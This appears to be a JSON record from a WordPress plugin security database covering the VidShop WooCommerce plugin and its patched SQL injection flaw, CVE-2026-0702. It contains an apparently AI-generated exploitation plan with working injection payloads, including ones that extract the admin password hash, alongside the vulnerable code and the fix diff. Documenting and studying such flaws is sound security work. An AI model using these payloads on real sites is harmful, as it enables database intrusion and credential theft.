[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f5mERPVFM2w6Qq6Iy3_VVTzEh4wJvczzqZBlug3Lg0RQ":3,"$fHNebJzy8IjrnjhwT3ZfsLW9cENb_ypk8xIOxf4oTE2E":298,"$fnpHNcbZ2eP69JvVwTxfvED_34iQD7VGBFPF4buoQ1HU":302},{"slug":4,"name":5,"version":6,"author":7,"author_profile":8,"description":9,"short_description":10,"active_installs":11,"downloaded":12,"rating":13,"num_ratings":14,"last_updated":15,"tested_up_to":16,"requires_at_least":17,"requires_php":18,"tags":19,"homepage":25,"download_link":26,"security_score":27,"vuln_count":28,"unpatched_count":29,"last_vuln_date":30,"fetched_at":31,"discovery_status":32,"vulnerabilities":33,"developer":66,"crawl_stats":39,"alternatives":72,"analysis":166,"fingerprints":264},"vidshop-for-woocommerce","VidShop – Shoppable Videos for WooCommerce","1.1.5","WPCreatix","https:\u002F\u002Fprofiles.wordpress.org\u002Fwpcreatix\u002F","\u003Cp>\u003Cstrong>VidShop Transforms Ecommerce with Interactive Shoppable Videos\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>VidShop brings the engaging experience of social media videos directly into your WooCommerce store, creating an immersive, swipe-driven shopping journey. 
Customers can effortlessly browse, interact with products, and make instant purchases—all within the video.\u003C\u002Fp>\n\u003Cp>Ideal for fashion brands, beauty retailers, electronics stores, home décor merchants, and any business seeking next-level video commerce.\u003C\u002Fp>\n\u003Cp>🎥 \u003Cstrong>Try VidShop Live:\u003C\u002Fstrong> \u003Ca href=\"https:\u002F\u002Fvidshop.wpcreatix.com\u002F?utm_campaign=vidshop-wordpress-org&utm_medium=demo_link&utm_source=WordPress.org\" rel=\"nofollow ugc\">Interactive Demo\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>🚀 \u003Cstrong>Upgrade to Pro:\u003C\u002Fstrong> \u003Ca href=\"https:\u002F\u002Fwpcreatix.com\u002F?utm_campaign=vidshop-wordpress-org&utm_medium=upgrade_link&utm_source=WordPress.org\" rel=\"nofollow ugc\">Get Premium Features\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>🚀 Why Choose VidShop?\u003C\u002Fh3>\n\u003Cp>✅ \u003Cstrong>Social Media-Style Navigation\u003C\u002Fstrong> – Swipe videos for engaging, app-like shopping.\u003Cbr \u002F>\n✅ \u003Cstrong>Seamless Purchase Experience\u003C\u002Fstrong> – Instantly buy products without leaving the video.\u003Cbr \u002F>\n✅ \u003Cstrong>In-Depth Analytics\u003C\u002Fstrong> – Track detailed video interactions and product performance.\u003Cbr \u002F>\n✅ \u003Cstrong>Mobile-Optimized\u003C\u002Fstrong> – Designed specifically for smartphone users.\u003Cbr \u002F>\n✅ \u003Cstrong>Easy to Use\u003C\u002Fstrong> – No coding skills required to set up stunning shoppable videos.\u003Cbr \u002F>\n✅ \u003Cstrong>WooCommerce Native\u003C\u002Fstrong> – Perfectly integrates with your existing WooCommerce store.\u003C\u002Fp>\n\u003Ch3>🎯 Key Features\u003C\u002Fh3>\n\u003Ch3>📊 Analytics Dashboard\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\u003Cstrong>Total & Unique Views\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Average & Total View Time\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Total & Unique 
Likes\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Add-to-Cart Metrics\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Product View Tracking\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Top Videos & Products Insights\u003C\u002Fstrong>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>🎬 Intuitive Video Management\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\u003Cstrong>Publish, Draft, Trash Status Management\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Easy Video Upload\u003C\u002Fstrong> (WordPress Media Library & Custom URLs)\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Product Linking & Association\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Bulk Actions & Quick Editing\u003C\u002Fstrong>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>⚙️ Smart Shortcode Generator\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Select videos: All or specific IDs\u003C\u002Fli>\n\u003Cli>Customize colors and layouts\u003C\u002Fli>\n\u003Cli>Easy copy-paste into pages\u002Fposts\u003C\u002Fli>\n\u003Cli>Multiple layouts: Grid, Carousel, and Inline (TikTok-style)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>📱 Engaging Frontend Experience\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\u003Cstrong>Swipeable Video Interface\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Interactive Product Circles\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Social Proof with View Counts & Likes\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Real-Time Shopping Cart\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Product Variations & Instant Checkout\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Mobile & Desktop Optimized\u003C\u002Fstrong>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>🛒 Product Integration\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Unlimited products per video\u003C\u002Fli>\n\u003Cli>Variable product support\u003C\u002Fli>\n\u003Cli>Live inventory synchronization\u003C\u002Fli>\n\u003Cli>Quick add-to-cart 
functionality\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>🎨 Brand Customization\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Color schemes aligned with your brand identity\u003C\u002Fli>\n\u003Cli>Responsive layouts and smooth animations\u003C\u002Fli>\n\u003Cli>Touch and mouse-friendly interactions\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>🔥 Easy 4-Step Setup\u003C\u002Fh3>\n\u003Cp>\u003Cstrong>Step 1: Add Your Video\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Upload or link your video and set a thumbnail.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Step 2: Connect Products\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Select relevant WooCommerce products to link.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Step 3: Generate Shortcode\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Customize your display (video selection, layout, colors).\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Step 4: Go Live\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Paste shortcode anywhere on your website to showcase videos instantly.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Example Implementation:\u003C\u002Fstrong>\u003Cbr \u002F>\n    \u003Ccode>[vsfw-videos videos=\"all\" type=\"grid\" color-schema=\"#1e40af\"]\u003Cbr \u002F>\n[vsfw-videos videos=\"123,456,789\" type=\"carousel\" color-schema=\"#e11d48\"]\u003Cbr \u002F>\n[vsfw-videos videos=\"all\" type=\"inline\" color-schema=\"#10b981\"]\u003Cbr \u002F>\n[vsfw-videos videos=\"all\" type=\"stories\" color-schema=\"#1e40af\" autoplay=\"yes\" loop=\"yes\"]\u003C\u002Fcode>\u003C\u002Fp>\n\u003Ch3>⚡ Performance & Compatibility\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Optimized for speed (lazy loading & caching)\u003C\u002Fli>\n\u003Cli>Compatible with popular caching & CDN solutions\u003C\u002Fli>\n\u003Cli>Mobile-first responsive design\u003C\u002Fli>\n\u003Cli>Secure, clean code with extensive hooks for developers\u003C\u002Fli>\n\u003Cli>Fully 
translation-ready\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>🌟 Industries Benefiting from VidShop\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\u003Cstrong>Fashion & Apparel\u003C\u002Fstrong>: Showcase products in action.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Beauty & Cosmetics\u003C\u002Fstrong>: Demonstrate product transformations.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Home & Décor\u003C\u002Fstrong>: Present real-world product placements.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Electronics & Tech\u003C\u002Fstrong>: Highlight features and unboxing.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Lifestyle Products\u003C\u002Fstrong>: Engage emotionally and increase sales.\u003C\u002Fli>\n\u003C\u002Ful>\n","Engage customers with swipeable shoppable videos, seamless checkout, and powerful analytics for WooCommerce.",400,1809,100,3,"2026-01-16T15:29:00.000Z","6.9.4","5.8","7.4",[20,21,22,23,24],"mobile-shopping","product-videos","shoppable-videos","video-commerce","woocommerce-videos","https:\u002F\u002Fwpcreatix.com\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fvidshop-for-woocommerce.1.1.5.zip",97,1,0,"2026-01-27 
00:00:00","2026-04-16T10:56:18.058Z","no_bundle",[34],{"id":35,"url_slug":36,"title":37,"description":38,"plugin_slug":4,"theme_slug":39,"affected_versions":40,"patched_in_version":6,"severity":41,"cvss_score":42,"cvss_vector":43,"vuln_type":44,"published_date":30,"updated_date":45,"references":46,"days_to_patch":28,"patch_diff_files":48,"patch_trac_url":39,"research_status":56,"research_verified":57,"research_rounds_completed":14,"research_plan":58,"research_summary":59,"research_vulnerable_code":60,"research_fix_diff":61,"research_exploit_outline":62,"research_model_used":63,"research_started_at":64,"research_completed_at":65,"research_error":39,"poc_status":39,"poc_video_id":39,"poc_summary":39,"poc_steps":39,"poc_tested_at":39,"poc_wp_version":39,"poc_php_version":39,"poc_playwright_script":39,"poc_exploit_code":39,"poc_has_trace":57,"poc_model_used":39,"poc_verification_depth":39},"CVE-2026-0702","vidshop-shoppable-videos-for-woocommerce-unauthenticated-time-based-sql-injection-via-fields","VidShop – Shoppable Videos for WooCommerce \u003C= 1.1.4 - Unauthenticated Time-Based SQL Injection via 'fields'","The VidShop – Shoppable Videos for WooCommerce plugin for WordPress is vulnerable to time-based SQL Injection via the 'fields' parameter in all versions up to, and including, 1.1.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. 
This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.",null,"\u003C=1.1.4","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-01-28 08:26:56",[47],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fa61d8d2a-742f-45f1-9146-f733b80ef195?source=api-prod",[49,50,51,52,53,54,55],"includes\u002Fmodels\u002Fclass-video-event-model.php","includes\u002Fmodels\u002Fclass-video-product-stats-model.php","includes\u002Fmodels\u002Fclass-video-session-model.php","includes\u002Frest-api\u002Fv1\u002Fclass-videos-controller.php","includes\u002Futils\u002Fclass-query-builder.php","readme.txt","vidshop-for-woocommerce.php","researched",false,"# Exploitation Research Plan: CVE-2026-0702 - VidShop SQL Injection\n\n## 1. Vulnerability Summary\nThe **VidShop – Shoppable Videos for WooCommerce** plugin (versions \u003C= 1.1.4) is vulnerable to an unauthenticated time-based SQL Injection. The vulnerability exists in the REST API handler for retrieving videos, specifically through the `fields` parameter. The plugin fails to sanitize or properly prepare the list of columns provided by the user before incorporating them into a `SELECT` statement within its custom `Query_Builder`.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-json\u002Fvidshop\u002Fv1\u002Fvideos` (GET)\n- **Vulnerable Parameter:** `fields`\n- **Authentication:** Unauthenticated (Default). 
The `check_public_permission` callback in `Videos_Controller` typically allows read access to published videos.\n- **Payload Type:** Time-based blind SQL injection (e.g., `SLEEP()`).\n- **Preconditions:** At least one video must exist in the database (specifically the `vsfw_videos` table) to trigger the execution of the `SELECT` clause for the returned rows.\n\n## 3. Code Flow\n1.  **Request Entry:** An unauthenticated user sends a GET request to `wp-json\u002Fvidshop\u002Fv1\u002Fvideos?fields=...`.\n2.  **Route Registration:** In `includes\u002Frest-api\u002Fv1\u002Fclass-videos-controller.php`, the route `\u002Fvideos` is registered with the `get_items` callback.\n3.  **Parameter Handling:** The `get_items` method retrieves the `fields` parameter from the `WP_REST_Request`.\n4.  **Query Building:** The controller uses `Video_Model::query()`, which returns an instance of `VSFW\\Utils\\Query_Builder`.\n5.  **Vulnerable Sink:** The controller calls `$query->select( explode( ',', $request['fields'] ) )`. \n6.  **SQL Construction:** In `includes\u002Futils\u002Fclass-query-builder.php`, the `select()` method populates the `$columns` array. When the query is executed (via `get()` or `get_raw()`), the builder constructs the SQL string by joining these columns: `SELECT field1, field2, [PAYLOAD] FROM wp_vsfw_videos...`.\n7.  **Execution:** The raw string is executed via `$wpdb->get_results()`, triggering the SQL payload.\n\n## 4. Nonce Acquisition Strategy\nREST API `GET` requests in WordPress typically do not require a nonce for public collections. However, if the environment is hardened:\n1.  **Trigger Script Loading:** Create a page containing the VidShop shortcode `[vsfw-videos]`.\n2.  **Identify Variable:** The plugin likely localizes script data via `wp_localize_script`. Based on standard VidShop patterns, check for a global object like `vidshop_data` or `vsfw_settings`.\n3.  
**Extraction:**\n    - `wp post create --post_type=page --post_status=publish --post_title=\"VidShop Test\" --post_content='[vsfw-videos]'`\n    - Navigate to the new page.\n    - `browser_eval(\"window.vsfw_settings?.rest_nonce\")` (inferred key).\n4.  **Bypass:** Check `Videos_Controller::check_public_permission`. If it returns `__return_true`, no nonce or authentication is required.\n\n## 5. Exploitation Strategy\nWe will use a time-based payload to confirm the injection.\n\n### Step 1: Confirm Injection\nSubmit a request that causes a 5-second delay.\n- **Method:** `GET`\n- **URL:** `\u002Fwp-json\u002Fvidshop\u002Fv1\u002Fvideos`\n- **Parameters:**\n    - `fields`: `id,(SELECT(1)FROM(SELECT(SLEEP(5)))a)`\n    - `per_page`: `1` (To ensure the sleep only triggers once)\n\n### Step 2: Data Extraction (Example: Admin Hash)\nExtract the first character of the admin password hash.\n- **Payload:** `id,(SELECT IF(ASCII(SUBSTR((SELECT user_pass FROM wp_users WHERE ID=1),1,1))=36,SLEEP(5),1))`\n- **Note:** `36` is the ASCII for `$`, which is the start of WordPress phpass hashes.\n\n### Request Format (via http_request):\n```json\n{\n  \"method\": \"GET\",\n  \"url\": \"http:\u002F\u002Fvulnerable-hostname.tld\u002Fwp-json\u002Fvidshop\u002Fv1\u002Fvideos\",\n  \"params\": {\n    \"fields\": \"id,(SELECT(1)FROM(SELECT(SLEEP(5)))a)\",\n    \"per_page\": \"1\"\n  }\n}\n```\n\n## 6. Test Data Setup\n1.  **Ensure WooCommerce is active:** The plugin requires it.\n2.  **Create a Video:** The injection requires at least one row in the videos table to execute the `SELECT` list expressions.\n    ```bash\n    wp eval \"VSFW\\Models\\Video_Model::create(['title' => 'Exploit Test', 'type' => 'media_library', 'thumbnail_id' => 1, 'status' => 'published']);\"\n    ```\n3.  **Verify Public Access:** Ensure the REST API is reachable.\n\n## 7. 
Expected Results\n- **Vulnerable Version:** The HTTP response will be delayed by approximately 5 seconds.\n- **Patched Version (1.1.5):** The response will return immediately, likely with a `400 Bad Request` or the `fields` parameter will be ignored\u002Fsanitized, returning only valid columns.\n\n## 8. Verification Steps\nAfter the HTTP request, verify the database state or logs:\n1.  **Check Query Logs:** If `WP_DEBUG` and `SAVEQUERIES` are on, check the SQL query logged.\n2.  **No Side Effects:** Since this is a `SELECT` injection, no data should be modified, but time-based confirmation is definitive.\n3.  **Manual Check:** \n    ```bash\n    wp db query \"SELECT id, (SELECT SLEEP(1)) FROM wp_vsfw_videos LIMIT 1;\"\n    ```\n    (This confirms the syntax used in the payload is valid for the target DB).\n\n## 9. Alternative Approaches\n- **Boolean-Based Blind:** If time-based is unreliable, use `fields=id,(CASE WHEN (1=1) THEN 1 ELSE 0 END)` and check if the returned JSON includes a column with value `1` vs `0`.\n- **Error-Based:** If `WP_DEBUG` is enabled, try `fields=id,updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users WHERE ID=1)),1)`.\n- **Different Endpoint:** Check if `GET \u002Fwp-json\u002Fvidshop\u002Fv1\u002Fvideos\u002F(?P\u003Cid>[\\d]+)` also processes the `fields` parameter via the same `get_item` logic.","The VidShop plugin for WordPress is vulnerable to unauthenticated time-based SQL Injection via the 'fields' parameter on the REST API videos endpoint. 
Due to insufficient validation and escaping within the Query_Builder's select method, an attacker can inject arbitrary SQL commands into the column list of a SELECT query.","\u002F\u002F includes\u002Frest-api\u002Fv1\u002Fclass-videos-controller.php (around line 309 in v1.1.4)\nif ( $fields ) {\n    $selected_fields = explode( ',', $fields );\n    $query->select( $selected_fields );\n}\n\n---\n\n\u002F\u002F includes\u002Futils\u002Fclass-query-builder.php (line 407 in v1.1.4)\npublic function select( $columns = array( '*' ) ) {\n    $this->columns = is_array( $columns ) ? $columns : func_get_args();\n    return $this;\n}","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fvidshop-for-woocommerce\u002F1.1.4\u002Fincludes\u002Frest-api\u002Fv1\u002Fclass-videos-controller.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fvidshop-for-woocommerce\u002F1.1.5\u002Fincludes\u002Frest-api\u002Fv1\u002Fclass-videos-controller.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fvidshop-for-woocommerce\u002F1.1.4\u002Fincludes\u002Frest-api\u002Fv1\u002Fclass-videos-controller.php\t2026-01-08 09:26:16.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fvidshop-for-woocommerce\u002F1.1.5\u002Fincludes\u002Frest-api\u002Fv1\u002Fclass-videos-controller.php\t2026-01-16 15:29:18.000000000 +0000\n@@ -180,6 +180,68 @@\n \t}\n \n \t\u002F**\n+\t * Get allowed fields for select query (whitelist for SQL injection prevention)\n+\t *\n+\t * @return array\n+\t *\u002F\n+\tprivate function get_allowed_fields() {\n+\t\treturn array(\n+\t\t\t'id',\n+\t\t\t'title',\n+\t\t\t'type',\n+\t\t\t'source_url',\n+\t\t\t'thumbnail_id',\n+\t\t\t'video_id',\n+\t\t\t'settings',\n+\t\t\t'status',\n+\t\t\t'created_by',\n+\t\t\t'created_at',\n+\t\t\t'updated_at',\n+\t\t);\n+\t}\n+\n+\t\u002F**\n+\t * Sanitize fields parameter - whitelist validation\n+\t 
*\n+\t * @param string $fields Comma-separated fields.\n+\t * @return string Sanitized fields.\n+\t *\u002F\n+\tpublic function sanitize_fields_param( $fields ) {\n+\t\tif ( empty( $fields ) ) {\n+\t\t\treturn '';\n+\t\t}\n+\t\terror_log( 'Sanitize fields parameter: ' . $fields );\n+\t\t$requested_fields = array_map( 'trim', explode( ',', $fields ) );\n+\t\t$allowed_fields   = $this->get_allowed_fields();\n+\t\t$valid_fields     = array_filter(\n+\t\t\t$requested_fields,\n+\t\t\tfunction ( $field ) use ( $allowed_fields ) {\n+\t\t\t\treturn in_array( $field, $allowed_fields, true );\n+\t\t\t}\n+\t\t);\n+\t\terror_log( 'Valid fields: ' . implode( ',', $valid_fields ) );\n+\t\treturn implode( ',', $valid_fields );\n+\t}\n+\n \t\u002F**\n \t * Get collection parameters\n \t *\u002F\n@@ -222,12 +284,14 @@\n \t\t\t\t'enum'        => array( 'asc', 'desc' ),\n \t\t\t),\n \t\t\t'fields'   => array(\n-\t\t\t\t'description' => __( 'Comma-separated list of fields to include in the response.', 'vidshop-for-woocommerce' ),\n-\t\t\t\t'type'        => 'string',\n+\t\t\t\t'description'       => __( 'Comma-separated list of fields to include in the response.', 'vidshop-for-woocommerce' ),\n+\t\t\t\t'type'              => 'string',\n+\t\t\t\t'sanitize_callback' => array( $this, 'sanitize_fields_param' ),\n \t\t\t),\n \t\t\t'ids'      => array(\n-\t\t\t\t'description' => __( 'Comma-separated list of video IDs.', 'vidshop-for-woocommerce' ),\n-\t\t\t\t'type'        => 'string',\n+\t\t\t\t'description'       => __( 'Comma-separated list of video IDs.', 'vidshop-for-woocommerce' ),\n+\t\t\t\t'type'              => 'string',\n+\t\t\t\t'sanitize_callback' => array( $this, 'sanitize_ids_param' ),\n \t\t\t),\n \t\t);\n \n@@ -303,7 +368,8 @@\n \t\t\t$query->order_by( $orderby, $order );\n \t\t}\n \n-\t\tif ( $fields ) {\n+\t\t\u002F\u002F Select specific fields (already validated via whitelist in sanitize_callback)\n+\t\tif ( ! 
empty( $fields ) ) {\n \t\t\t$selected_fields = explode( ',', $fields );\n \t\t\t$query->select( $selected_fields );\n \t\t}","The exploit targets the public WordPress REST API endpoint \u002Fwp-json\u002Fvidshop\u002Fv1\u002Fvideos. An attacker makes a GET request and provides a SQL payload within the 'fields' parameter. Because the plugin uses explode() on the 'fields' string and passes the resulting array directly into a SELECT statement without validation, an attacker can append a subquery using time-based functions like SLEEP(). \n\nPayload Structure: \nGET \u002Fwp-json\u002Fvidshop\u002Fv1\u002Fvideos?fields=id,(SELECT(1)FROM(SELECT(SLEEP(5)))a)&per_page=1\n\nAuthentication: None required (Unauthenticated).\nCondition: At least one entry must exist in the 'vsfw_videos' table for the SELECT query to execute the SLEEP payload.","gemini-3-flash-preview","2026-05-04 22:58:55","2026-05-04 22:59:13",{"slug":67,"display_name":7,"profile_url":8,"plugin_count":68,"total_installs":69,"avg_security_score":70,"avg_patch_time_days":28,"trust_score":70,"computed_at":71},"wpcreatix",2,900,99,"2026-05-19T21:59:07.392Z",[73,96,112,130,146],{"slug":74,"name":75,"version":76,"author":77,"author_profile":78,"description":79,"short_description":80,"active_installs":81,"downloaded":82,"rating":13,"num_ratings":83,"last_updated":84,"tested_up_to":85,"requires_at_least":86,"requires_php":87,"tags":88,"homepage":92,"download_link":93,"security_score":94,"vuln_count":68,"unpatched_count":68,"last_vuln_date":95,"fetched_at":31},"live-shopping-video-streams","Live Shopping & Shoppable Videos For WooCommerce","2.2.0","Channelize.io Team","https:\u002F\u002Fprofiles.wordpress.org\u002Fchannelizeio\u002F","\u003Cp>\u003Cstrong>“Live Shopping”\u003C\u002Fstrong> & \u003Cstrong>“Shoppable Videos”\u003C\u002Fstrong> by Channelize.io enable Brands to Boost Sales and Enhance their Brand Perception by connecting better with their Buyers and Showcasing their Products in ways that lead to 
Informed, Trusted & Accelerated Purchases by Buyers. Going Live & Uploading Videos are easy. They’re mobile responsive and do not impact site speed. With add-to-cart within videos, buyers get a watch & buy experience that drives Conversions. Syncing of product info, availability & Shopify Cart makes a seamless experience.\u003C\u002Fp>\n\u003Cp>Live Shopping or \u003Cstrong>“Livestream Shopping\u003C\u002Fstrong>” lets you sell through \u003Cstrong>“Live Video Shopping\u003C\u002Fstrong>“, engage with your buyers in real-time & attract new prospects with exclusive products & deals. It helps brands & store owners to elevate Product Experiences for buyers, enable In-context Buying, connect with buyers in real-time, & Foster Communities, all while generating incredible Sales. All this buyer engagement and interaction happens right within your websites via our \u003Cstrong>“Live Shopping\u003C\u002Fstrong>” App.\u003C\u002Fp>\n\u003Cp>Shoppable Videos or Short form Videos enable you to make any Video you already have, Shoppable in seconds & Boost Sales & Engagement. 
Easily engage & convert shoppers with a watch & buy experience and effectively reuse your TikTok & Instagram Reel Videos on your website.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Key Features\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>“Live Shop” page for your store\u003C\u002Fli>\n\u003Cli>In-show Products Promotion, Product Spotlight, & Add-to-Cart\u003C\u002Fli>\n\u003Cli>Live Chat with Pinned Messages, & Reactions for the audience\u003C\u002Fli>\n\u003Cli>Host App (iOS & Android) for Hosts to go Live\u003C\u002Fli>\n\u003Cli>Production Dashboard\u003C\u002Fli>\n\u003Cli>Live Chat moderation\u003C\u002Fli>\n\u003Cli>Multi-host Selling\u003C\u002Fli>\n\u003Cli>Real-time Products Update\u003C\u002Fli>\n\u003Cli>Multistreaming\u003C\u002Fli>\n\u003Cli>Custom RTMP Support\u003C\u002Fli>\n\u003Cli>Shopping Show Analytics\u003C\u002Fli>\n\u003Cli>Recordings for post-live engagement & more sales\u003C\u002Fli>\n\u003Cli>Multi-lingual interface\u003C\u002Fli>\n\u003Cli>Embed Shopping Shows\u003C\u002Fli>\n\u003Cli>New Buyers’ Interface\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Generate more sales\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Live Selling Shows & Shoppable Videos to \u003Cstrong>Boost Conversions\u003C\u002Fstrong> & \u003Cstrong>Buyer Retention\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>Reuse existing UGC videos from \u003Cstrong>Instagram\u003C\u002Fstrong>, \u003Cstrong>TikTok\u003C\u002Fstrong> & \u003Cstrong>Facebook\u003C\u002Fstrong> with a single click\u003C\u002Fli>\n\u003Cli>Easy Go-live with Host Apps or \u003Cstrong>RTMP support\u003C\u002Fstrong> using Cameras & Pre-recorded Videos\u003C\u002Fli>\n\u003Cli>Video Listing Page; Display videos anywhere with Layouts: \u003Cstrong>Carousel & Floating\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>Simulcasting, Email & SMS Notifications, Unique URL, etc to get large 
watchers\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Benefits\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Improved conversion rates\u003C\u002Fli>\n\u003Cli>Increased session time & repeat customer visits\u003C\u002Fli>\n\u003Cli>Gather real-time analytics during Live Shopping Shows\u003C\u002Fli>\n\u003Cli>Post-event metrics & KPIs to analyze sales\u003C\u002Fli>\n\u003Cli>Lowered Customer Acquisition Cost (CAC)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Exclusive Support\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Personalized Free Demo to help you begin.\u003C\u002Fli>\n\u003Cli>Rolling out new features & iterating existing ones time to time\u003C\u002Fli>\n\u003Cli>Refer to Help Center, eBooks, Blogs, & Tutorials to get started quickly\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Ready to start your Live Selling journey?\u003C\u002Fstrong>\u003Cbr \u002F>\nEmail \u003Ca href=\"mailto:info@Channelize.io\" rel=\"nofollow ugc\">info@channelize.io\u003C\u002Fa> to book a quick demo call!\u003C\u002Fp>\n","Easy-to-install Plugin that adds Live Shopping, Shoppable Videos & Live Commerce as Sales Channels to WooCommerce Stores to Sell & Promote Products",600,8520,8,"2025-07-30T12:22:00.000Z","6.8.5","5.0","7.2",[89,90,91,22,23],"live-selling","live-shopping","live-video-shopping","http:\u002F\u002FN\u002FA","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flive-shopping-video-streams.2.2.0.zip",56,"2025-12-31 00:00:00",{"slug":97,"name":98,"version":99,"author":100,"author_profile":101,"description":102,"short_description":103,"active_installs":29,"downloaded":104,"rating":29,"num_ratings":29,"last_updated":105,"tested_up_to":85,"requires_at_least":106,"requires_php":18,"tags":107,"homepage":110,"download_link":111,"security_score":13,"vuln_count":29,"unpatched_count":29,"last_vuln_date":39,"fetched_at":31},"immersive-shopping-and-videos","Immersive Shopping and 
Videos","1.16","aveytsman","https:\u002F\u002Fprofiles.wordpress.org\u002Faveytsman\u002F","\u003Cp>Transform Your Online Store\u003C\u002Fp>\n\u003Cp>Transform your online store with technology that help customers see, understand, and buy your products with confidence with or WITHOUT human interference. Perfect for products that need to be explained or demonstrated.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Show customers how your product will work for them RIGHT WHEN THEY NEED IT THE MOST.\u003C\u002Fstrong> Guide them all the way to purchase with unparalleled shopping experience.\u003C\u002Fp>\n\u003Ch3>Results\u003C\u002Fh3>\n\u003Cp>Much higher conversions, reduced returns, increased AOVs, and solidified, trustworthy customer relationships.\u003C\u002Fp>\n\u003Ch3>Features\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\u003Cstrong>Autonomous Sales Agent\u003C\u002Fstrong> is equivalent to store owner answering questions 24\u002F7  \u003C\u002Fli>\n\u003Cli>\u003Cstrong>Personal Shopping Assistant\u003C\u002Fstrong> guides customers through purchases via video support  \u003C\u002Fli>\n\u003Cli>\u003Cstrong>Live shopping\u003C\u002Fstrong> with instant purchasing and sales tracking  \u003C\u002Fli>\n\u003Cli>\u003Cstrong>Recorded shoppable videos\u003C\u002Fstrong> with UGC sales tracking  \u003C\u002Fli>\n\u003Cli>\u003Cstrong>Short product videos\u003C\u002Fstrong> that sell better than pictures\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>See It In Action\u003C\u002Fh3>\n\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002FqWz-uyKltlo?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&wmode=transparent\" 